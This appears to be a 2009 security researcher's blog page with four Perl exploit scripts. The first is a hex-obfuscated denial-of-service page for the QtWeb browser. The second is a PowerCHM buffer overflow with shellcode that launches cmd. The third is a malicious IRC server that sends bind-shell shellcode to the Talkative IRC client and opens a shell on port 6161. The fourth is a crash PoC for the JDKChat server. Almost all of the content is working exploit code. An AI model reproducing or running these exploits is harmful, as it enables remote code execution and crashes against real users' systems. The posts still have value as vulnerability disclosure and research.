31 March, 2009

QtWeb Internet Browser 2.0 (build 043) Remote Denial of Service Exploit (smile)

###################################################################################
#
# QtWeb Internet Browser 2.0 (build 043) Remote Denial of Service Exploit (smile)
#
# Summary: QtWeb is compact, portable and secure web browser having some unique UI
# and privacy features. QtWeb is an open source project based on Nokia's Qt framework
# (former Trolltech) and Apple's WebKit rendering engine (the same as being used in
# Apple Safari and Google Chrome).
#
# Happy Exploit.
#
# Product web page: http://www.qtweb.net/
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 01.04.2009
#
###################################################################################

$S="\x3C\x68\x74\x6D\x6C\x3E\x0D\x0A".
"\x3C\x74\x69\x74\x6C\x65\x3E\x51\x74\x57\x65\x62".
"\x20\x49\x6E\x74\x65\x72\x6E\x65\x74\x20\x42\x72\x6F\x77\x73\x65".
"\x72\x20\x32". "\x2E\x30\x20".
"\x28\x62". "\x75\x69".
"\x6C\x64". "\x20\x30".
"\x34\x33". "\x29\x20".
"\x52\x65". "\x6D\x6F".
"\x74\x65". "\x20\x44".
"\x65\x6E". "\x69\x61".
"\x6C\x20". "\x6F\x66".
"\x20\x53". "\x65\x72".
"\x76\x69". "\x63\x65".
"\x20\x45". "\x78\x70".
"\x6C\x6F". "\x69\x74". "\x3C\x2F". "\x54\x69".
"\x74\x6C". "\x65". "\x3E". "\x0D". "\x0A". "\x3C\x68".
"\x65\x61". "\x64". "\x3E". "\x3C". "\x62". "\x6F\x64".
"\x79\x3E". "\x3C". "\x73". "\x63". "\x72". "\x69\x70".
"\x74\x20". "\x74\x79".
"\x70\x65". "\x3D\x22".
"\x74\x65". "\x78\x74".
"\x2F\x6A". "\x61\x76".
"\x61\x73". "\x63\x72".
"\x69\x70". "\x74\x22".
"\x3E\x0D". "\x0A\x61".
"\x6C\x65". "\x72\x74".
"\x28\x22". "\x51\x74".
"\x57\x65". "\x62\x20".
"\x49\x6E". "\x74\x65".
"\x72\x6E". "\x65\x74".
"\x20\x42". "\x72\x6F".
"\x77\x73". "\x65\x72".
"\x20\x32". "\x2E\x30".
"\x20\x28". "\x62". "\x75". "\x69\x6C".
"\x64\x20". "\x30". "\x34". "\x33\x29".
"\x20\x52". "\x65". "\x6D". "\x6F\x74".
"\x65\x20". "\x44". "\x65". "\x6E\x69".
"\x61\x6C". "\x20". "\x6F". "\x66\x20".
"\x53\x65". "\x72". "\x76". "\x69\x63".
"\x65\x20". "\x45". "\x78". "\x70\x6C".
"\x6F\x69". "\x74". "\x5C". "\x6E\x5C".
"\x6E\x5C". "\x74". "\x5C". "\x74\x5C".
"\x74\x62". "\x79". "\x20". "\x4C\x69".
"\x71\x75". "\x69". "\x64". "\x57\x6F".
"\x72\x6D". "\x20". "\x28". "\x63\x29".
"\x20\x32". "\x30". "\x30". "\x39\x22".
"\x29\x3B". "\x0D\x0A\x66". "\x75\x6E".
"\x63\x74". "\x69\x6F".
"\x6E\x20". "\x64\x6F".
"\x7A\x28". "\x29\x20".
"\x7B\x0D". "\x0A\x74".
"\x69\x74". "\x6C\x65".
"\x3D\x22". "\x48\x6F".
"\x74\x20". "\x49\x63".
"\x65\x22". "\x3B\x0D".
"\x0A\x75". "\x72\x6C".
"\x3D\x22". "\x68\x74".
"\x74\x70\x3A". "\x2F\x2F\x77".
"\x77\x77\x2E\x6D\x69\x6C\x77\x30\x72\x6D\x2E\x63\x6F\x6D\x2F".
"\x22\x3B\x0D\x0A\x69\x66\x20\x28\x77\x69\x6E\x64".
"\x6F\x77\x2E\x73\x69\x64\x65\x62";$M=




"\x61". "\x72" ."\x29". "\x20".
"\x7B". "\x0D" ."\x0A". "\x77". "\x69".
"\x6E"."\x64". "\x6F". "\x77". "\x2E".
"\x73". "\x69". "\x64". "\x65".
"\x62". "\x61". "\x72". "\x2E".
"\x61". "\x64". "\x64". "\x50".
"\x61". "\x6E". "\x65". "\x6C".
"\x28". "\x74". "\x69". "\x74".
"\x6C". "\x65". "\x2C". "\x20".
"\x75". "\x72". "\x6C". "\x2C".
"\x22". "\x22". "\x29". "\x3B".
"\x0D". "\x0A"."\x7D".
"\x20". "\x65". "\x6C".
"\x73";




$I="\x65\x20\x69\x66\x28\x20\x77".
"\x69\x6E\x64\x6F\x77".
"\x2E\x65\x78\x74\x65\x72\x6E".
"\x61\x6C\x20\x29\x20". ##############
"\x7B\x0D\x0A\x77\x69\x6E\x64". ## #
"\x6F\x77\x2E\x65"."\x78". ######
"\x74\x65\x72\x6E\x61". ########## _ _ _
"\x6C\x2E\x41\x64\x64\x46\x61\x76\x6F\x72\x69". #==---- #==---- #==----
"\x74\x65\x28\x20\x75".
"\x72\x6C\x2C\x20\x74". ##===*
"\x69\x74\x6C\x65\x29\x3B\x0D".
"\x0A\x7D\x20\x65\x6C".
"\x73\x65\x20\x69\x66\x28\x77".
"\x69\x6E\x64\x6F\x77".
"\x2E\x6F\x70\x65\x72\x61\x20";
####################


$L="\x26\x26\x20\x77\x69\x6E\x64\x6F\x77\x2E".
"\x70\x72\x69\x6E\x74\x29\x20\x7B".
"\x20\x0D\x0A\x72\x65\x74".
"\x75\x72\x6E\x20".
"\x28\x74\x72".
"\x75\x65".
"\x29".
"\x3B".
"\x20\x7D".
"\x7D\x0D\x0A".
"\x76\x61\x72\x20".
"\x61\x73\x6B\x20\x3D\x20".
"\x63\x6F\x6E\x66\x69\x72\x6D\x28".
"\x22\x50\x72\x65\x73\x73\x20\x4F\x4B\x20".
"\x74\x6F\x20\x73\x74\x61\x72\x74".
"\x20\x74\x68\x65\x20\x44".
"\x6F\x53\x2E\x5C".
"\x6E\x50\x72".
"\x65\x73".
"\x73".
"\x20".
"\x4E\x6F".
"\x20\x74\x6F".
"\x20\x64\x6F\x64".
"\x67\x65\x20\x74\x68\x65".
"\x20\x44\x6F\x53\x2E\x22\x29\x3B".
"\x0D\x0A\x69\x66\x20\x28\x61\x73\x6B\x20".
"\x3D\x3D\x20\x74\x72\x75\x65\x29".
"\x20\x7B\x20\x0D\x0A\x66".
"\x6F\x72\x20\x28".
"\x78\x3D\x30".
"\x3B\x20".
"\x78".
"\x3C".
"\x78\x2B".
"\x31\x3B\x20".
"\x78\x2B\x2B\x29".
"\x20\x64\x6F\x7A\x28\x29".
"\x3B\x0D\x0A\x7D\x20\x65\x6C\x73".
"\x65\x09\x7B\x20\x61\x6C\x65\x72\x74\x28".
"\x22\x4F\x6B\x20\x3A\x28\x22\x29".
"\x3B\x0D\x0A\x77\x69\x6E".
"\x64\x6F\x77\x2E".
"\x6C\x6F\x63".
"\x61\x74".
"\x69".
"\x6F".
"\x6E\x2E".
"\x68\x72\x65".
"\x66\x20\x3D\x20".
"\x22\x68\x74\x74\x70\x3A".
"\x2F\x2F\x77\x77\x77\x2E\x71\x74".
"\x77\x65\x62\x2E\x6E\x65\x74\x2F\x22\x3B";
#########
$E="\x0D\x0A\x7D\x20".
"\x3C\x2F\x73\x63".
"\x72\x69\x70\x74".
"\x3E\x3C\x2F\x62".
"\x6F\x64\x79\x3E".
"\x3C\x2F\x68\x65".
"\x61\x64\x3E\x3C".
"\x2F\x68\x74\x6D".
"\x6C\x3E";#####____

my $file = "Smile.html";
my $fun = $S.$M.$I.$L.$E;
open (mrowdiuqil, ">./$file") || die "\nMffff... $!\n";
print mrowdiuqil "$fun";
close (mrowdiuqil);
print "\n[+] File $file created with funny potion\!\n\n";



http://www.zeroscience.org/codes/qtweb_dos.txt

29 March, 2009

Waldorf & Statler

PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit

--------------------------
#!/usr/bin/perl
#
# Title: PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit
#
# Summary: With PowerCHM you can create your CHM files
# automatically from Html Files (including .htm, .html
# and .mht), Text Files (.txt), Microsoft Word Documents
# (.doc) and Adobe Acrobat Document (.pdf).
#
# Product web page: http://www.dawningsoft.com/products/powerchm.htm
#
# Tested on WinXP Pro SP2 (English)
#
# Refs: http://www.milw0rm.com/exploits/8300
# http://security.biks.vn/?p=365
#
# Exploit by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 28.03.2009
#

my $header="
[OPTIONS]\n
Compatibility=1.1 or later\n
Compiled file=zero.chm\n
Contents file=science.hhc\n
Index file=lqwrm.hhk\n
Binary Index=Yes\n
Language=0x042F\n
Title=\n
Error log file=Errlog.txt\n
Default Window=main\n\n
[WINDOWS]\n
main='',science.hhc,lqwrm.hhk,'','',,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0\n\n
[FILES]\n\n
[INFOTYPES]\n
";


my $sc ="\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45".
"\xFD\x6D\xC6\x45\xFE\x64\xC6\x45\xF8\x01\x8D".
"\x45\xFC\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";


my $bof = "\x90" x 568 . "$sc" . "\x41" x 400 . "\xe8\xed\x12\x00" . "\x42" x 500;

my $file = "Watchmen.hhp";
open (hhp, ">./$file") || die "\nCan't open $file: $!";
print hhp "$header" . "$bof";
close (hhp);
sleep 1;
print "\nFile $file successfully created!\n";



http://www.milw0rm.com/exploits/8301

16 March, 2009

Talkative IRC 0.4.4.16 Remote Stack Overflow Exploit (SEH)

=========================================================
#!/usr/bin/perl
#
# Title: Talkative IRC 0.4.4.16 Remote Stack Overflow Exploit (SEH)
#
# Summary: The easiest and fastest way to meet people online. With Talkative IRC you can
# chat with thousands of people at the same time. Find people with the same interests as you.
# Join channels where you can meet people speaking your language, or start your own. No
# monthly fees or other hassle, just a download and a click. Version 0.4.4.16 makes nick list
# font customizable. Why Talkative? Mainly because it's secure, stable and easy to use.
#
# Product web page: http://www.talkative-irc.com/
#
# Desc: Talkative IRC 0.4.4.16 suffers from a stack based buffer overflow vulnerability that enables us
# to gain full control over the application and execute arbitrary commands. ECX and EIP registers gets
# overwriten, so does the SEH.
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Ref: http://www.milw0rm.com/exploits/6654
#
#
#---------------------------------------------windbg output--------------------------------------------------
#
# (398.ca4): Unknown exception - code 0eedfade (first chance)
# (398.3f8): Unknown exception - code 0eedfade (first chance)
# (398.3f8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000000 ecx=0013f0d0 edx=00000008 esi=00000000 edi=00421c40
# eip=004d8260 esp=0013f08c ebp=0013f1c4 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** WARNING: Unable to verify checksum for image00400000
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0xd8260:
# 004d8260 8b40f0 mov eax,dword ptr [eax-10h] ds:0023:41414131=????????
# 0:000> g
# (398.3f8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=42424242 edx=7c9037d8 esi=00000000 edi=00000000
# eip=42424242 esp=0013ecbc ebp=0013ecdc iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 42424242 ?? ???
#
#---------------------------------------------windbg output--------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# http://www.zeroscience.org/
#
# liquidworm {z} gmail {z} com
#
# 17.03.2009
#

use IO::Socket;

sub start_zerver()
{
my $sock = new IO::Socket::INET(
Listen => 1,
LocalAddr => 'localhost',
LocalPort => 6667,
Proto => 'tcp'
);
die unless $sock;

header();

print "\n [*] Evil IRC Server started on port 6667\n";

my $wire = $sock -> accept();

my $junky = "A" x 272;
my $next_seh = "\xeb\x06\x90\x90";
my $seh = "\x9a\x72\x85\x7c"; #0x7C85729A pop pop ret kernel32.dll
my $nop_start = "\x90" x 25;
my $nop_end = "\x90" x 10;

# win32_bind - EXITFUNC=seh LPORT=6161 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58".
"\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x54\x4e\x33\x4b\x58\x4e\x37".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x58".
"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x48".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x52\x4a\x42\x45\x37\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54".
"\x4b\x48\x4f\x35\x4e\x41\x41\x50\x4b\x4e\x43\x30\x4e\x42\x4b\x48".
"\x49\x58\x4e\x36\x46\x32\x4e\x31\x41\x56\x43\x4c\x41\x33\x4b\x4d".
"\x46\x36\x4b\x38\x43\x54\x42\x43\x4b\x38\x42\x54\x4e\x30\x4b\x58".
"\x42\x57\x4e\x41\x4d\x4a\x4b\x38\x42\x34\x4a\x30\x50\x35\x4a\x56".
"\x50\x48\x50\x54\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56".
"\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x37\x43\x47".
"\x44\x33\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x33\x42\x35\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
"\x48\x46\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x56\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35".
"\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x55\x43\x45\x43\x45\x43\x34".
"\x43\x35\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x4a\x51".
"\x41\x51\x48\x46\x43\x55\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a".
"\x4c\x51\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x36\x42\x31".
"\x41\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x42".
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d".
"\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x35\x4f\x4f\x48\x4d".
"\x42\x55\x46\x35\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x46".
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x35".
"\x4f\x4f\x42\x4d\x48\x36\x4c\x56\x46\x56\x48\x46\x4a\x36\x43\x36".
"\x4d\x56\x49\x48\x45\x4e\x4c\x56\x42\x35\x49\x45\x49\x42\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x53\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x34\x4e\x52".
"\x43\x59\x4d\x48\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56".
"\x44\x37\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x34\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x35\x41\x45\x41\x45\x4c\x56".
"\x41\x50\x41\x45\x41\x55\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x46".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f".
"\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d".
"\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x45\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";

print " [*] Throwing payload...\r\n";

print $wire ":irc_server.stuff 001 jox :Welcome to the Internet Relay Network jox\r\n";

sleep(1);

print $wire ":" . "$junky" . "$next_seh" . "$seh" . "$nop_start" . "$shellcode" . "$nop_end" . " PRIVMSG t00t : /FINGER w00t.\r\n";
}

while (1)
{
start_zerver();
print " [*] Talkative IRC client successfully exploited!\r\n\n";
print " [**] Check shell on port 6161! [**]\r\n";
next;
}

sub header()
{
print "\n";
print "~" x 80;
print "\n";
print " Talkative IRC v0.4.4.16 Remote Stack Overflow Exploit (SEH)\n";
print " by LiquidWorm (c) 2009\n\n";
print "~" x 80;
print "\n\n";
}

=========================================================






http://zeroscience.org/codes/talkirc_seh.txt
http://www.destr0y.net/showthread.php?t=926

11 March, 2009

JDKChat v1.5 Remote Integer Overflow PoC

--------------------------------------------------------
#!/usr/bin/perl
#
# Title: JDKChat v1.5 Remote Integer Overflow PoC
#
# Summary: JDKChat is a simple C++ chat server for GNU/Linux systems.
# Users can connect to it through a simple tcp client like telnet.
#
# WebSite : http://www.jdkoftinoff.com/
#
# ---------------------------- Demo ---------------------------------
# aleks@tux ~ $ telnet 192.168.0.1 7777
# Trying 192.168.0.1...
# Connected to 192.168.0.1.
# Escape character is '^]'.
# Welcome To jdkchat v1.5 by J.D. Koftinoff Software, Ltd.
# http://www.jdkoftinoff.com/
# and modified by Aditya Godbole (urwithaditya@gmx.net)
# Commands available:
# /who -- (list all users along with their connection numbers)
# /exit -- (exit chat room)
# /local -- (toggle local mode for your telnet session)
# /[connection number] message -- (send private message to user at
# specified connection number)
#
#
# JDKCHAT: Aleks just entered the room.
# JDKCHAT: Users = Aleks:0
# Aleks >
#
#
# // And after we run the PoC :
#
# JDKCHAT: PwNzOr just entered the room.
# Aleks >Connection closed by foreign host.
# aleks@tux ~ $
#
# ---------------------------- /Demo --------------------------------
#
#
# Vulnerability discovered by n3tpr0b3 & LiquidWorm
#
# n3tpr0b3 [AT] gmail [.] com
#
# 12.03.2009
#

use IO::Socket;

if ($#ARGV != 1) {
print "
JDKChat v1.5 Remote Integer Overflow PoC By n3tpr0b3
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Usage : jdkchat_poc.pl SrvIP SrvPort #
# Greetz to LiquidWorm #
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n";
exit;
}

my $dupsa = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp"
)
or die "Could not connect to $ARGV[0]: $!\n";

sleep 1;
print $dupsa "\x50\x77\x4e\x7a\x4f\x72\x0d";
print "#--> Loged on t3h JDKChat server...\n";
sleep 1;
print "#--> Sending our evil command... \n";
sleep 2;
print $dupsa "\x2f\x2d\x31\x0d";
close($dupsa);
print "#--> Server pwned... \n";

-------------------------------------------------------



http://zeroscience.org/codes/jdkchat_poc.txt